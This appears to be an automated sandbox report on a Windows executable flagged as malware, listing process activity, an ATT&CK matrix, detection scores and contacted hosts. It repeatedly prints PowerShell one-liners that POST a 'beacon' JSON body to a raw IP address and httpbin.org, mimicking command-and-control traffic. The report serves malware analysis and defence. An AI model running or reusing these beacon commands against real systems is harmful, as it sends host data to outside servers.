Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://44.207.250.251/post\" -method post -body ($b\|ConvertTo-Json) -headers $headers -ContentType \"application/json\""	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://httpbin.org/post\" -method post -body ($b\|ConvertTo-Json) -headers $headers -ContentType \"application/json\""	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://44.207.250.251/post\" -method post -body ($b\|ConvertTo-Json) -headers $headers -ContentType \"application/json\""	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://httpbin.org/post\" -method post -body ($b\|ConvertTo-Json) -headers $headers -ContentType \"application/json\""	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "$function:irm = { invoke-restmethod @args }; $headers = @{\"user-agent\"=\"mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/108.0.0.0 safari/537.36\"}; $b=@{d=\"this is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the c2 server, among other things.\"}; irm \"http://44.207.250.251/post\" -method post -body ($b\|convertto-json) -headers $headers -contenttype \"application/json\""
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "$function:irm = { invoke-restmethod @args }; $headers = @{\"user-agent\"=\"mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/108.0.0.0 safari/537.36\"}; $b=@{d=\"this is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the c2 server, among other things.\"}; irm \"http://httpbin.org/post\" -method post -body ($b\|convertto-json) -headers $headers -contenttype \"application/json\""
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "$function:irm = { invoke-restmethod @args }; $headers = @{\"user-agent\"=\"mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/108.0.0.0 safari/537.36\"}; $b=@{d=\"this is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the c2 server, among other things.\"}; irm \"http://44.207.250.251/post\" -method post -body ($b\|convertto-json) -headers $headers -contenttype \"application/json\""
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "$function:irm = { invoke-restmethod @args }; $headers = @{\"user-agent\"=\"mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/108.0.0.0 safari/537.36\"}; $b=@{d=\"this is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the c2 server, among other things.\"}; irm \"http://httpbin.org/post\" -method post -body ($b\|convertto-json) -headers $headers -contenttype \"application/json\""
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "$function:irm = { invoke-restmethod @args }; $headers = @{\"user-agent\"=\"mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/108.0.0.0 safari/537.36\"}; $b=@{d=\"this is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the c2 server, among other things.\"}; irm \"http://44.207.250.251/post\" -method post -body ($b\|convertto-json) -headers $headers -contenttype \"application/json\""
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "$function:irm = { invoke-restmethod @args }; $headers = @{\"user-agent\"=\"mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/108.0.0.0 safari/537.36\"}; $b=@{d=\"this is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the c2 server, among other things.\"}; irm \"http://httpbin.org/post\" -method post -body ($b\|convertto-json) -headers $headers -contenttype \"application/json\""
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "$function:irm = { invoke-restmethod @args }; $headers = @{\"user-agent\"=\"mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/108.0.0.0 safari/537.36\"}; $b=@{d=\"this is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the c2 server, among other things.\"}; irm \"http://44.207.250.251/post\" -method post -body ($b\|convertto-json) -headers $headers -contenttype \"application/json\""	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "$function:irm = { invoke-restmethod @args }; $headers = @{\"user-agent\"=\"mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/108.0.0.0 safari/537.36\"}; $b=@{d=\"this is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the c2 server, among other things.\"}; irm \"http://httpbin.org/post\" -method post -body ($b\|convertto-json) -headers $headers -contenttype \"application/json\""	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "$function:irm = { invoke-restmethod @args }; $headers = @{\"user-agent\"=\"mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/108.0.0.0 safari/537.36\"}; $b=@{d=\"this is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the c2 server, among other things.\"}; irm \"http://44.207.250.251/post\" -method post -body ($b\|convertto-json) -headers $headers -contenttype \"application/json\""	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "$function:irm = { invoke-restmethod @args }; $headers = @{\"user-agent\"=\"mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/108.0.0.0 safari/537.36\"}; $b=@{d=\"this is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the c2 server, among other things.\"}; irm \"http://httpbin.org/post\" -method post -body ($b\|convertto-json) -headers $headers -contenttype \"application/json\""	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "$function:irm = { invoke-restmethod @args }; $headers = @{\"user-agent\"=\"mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/108.0.0.0 safari/537.36\"}; $b=@{d=\"this is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the c2 server, among other things.\"}; irm \"http://44.207.250.251/post\" -method post -body ($b\|convertto-json) -headers $headers -contenttype \"application/json\""	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "$function:irm = { invoke-restmethod @args }; $headers = @{\"user-agent\"=\"mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/108.0.0.0 safari/537.36\"}; $b=@{d=\"this is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the c2 server, among other things.\"}; irm \"http://httpbin.org/post\" -method post -body ($b\|convertto-json) -headers $headers -contenttype \"application/json\""	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Command and Scripting Interpreter	1 DLL Side-Loading	11 Process Injection	1 Masquerading	OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	21 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	12 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	11 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	39%	ReversingLabs	Win64.Trojan.Generic
SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	59%	Virustotal		Browse
SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
httpbin.org	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://aka.ms/pscore68	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://www.apache.org/licenses/LICENSE-2.0.html	0%	Virustotal		Browse
http://httpbin.org/post	1%	Virustotal		Browse
http://44.207.250.251/post34282f2a34282f2b356a75696e.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH	0%	Virustotal		Browse
http://44.207.250.251	0%	Virustotal		Browse
https://github.com/Pester/Pester	1%	Virustotal		Browse
http://www.microsoft.co	1%	Virustotal		Browse
http://44.207.250.251/post	0%	Virustotal		Browse
http://httpbin.org	1%	Virustotal		Browse
http://44.207.250.251/postPATHEXTPATHEXT=::=::	0%	Virustotal		Browse
http://www.apache.org/licenses/LICE	0%	Virustotal		Browse
http://44.207.250.251/post34282f2a34282f2b356a75696e	0%	Virustotal		Browse
https://github.com/Pester/Pesterp	0%	Virustotal		Browse
http://httpbin.o	0%	Virustotal		Browse
http://44.207.250.251/postPATHEXTC:	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
httpbin.org	107.22.40.220	true	true	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://httpbin.org/post	true	1%, Virustotal, Browse	unknown
http://44.207.250.251/post	true	0%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.1969487291.000001F18199D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1981769027.000001F190075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1981769027.000001F1901B8000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://44.207.250.251	powershell.exe, 00000002.00000002.1969487291.000001F180C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2352922675.000001DC856C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2774951356.000001DCA9147000.00000004.00000800.00020000.00000000.sdmp	true	0%, Virustotal, Browse	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000002.00000002.1969487291.000001F180232000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
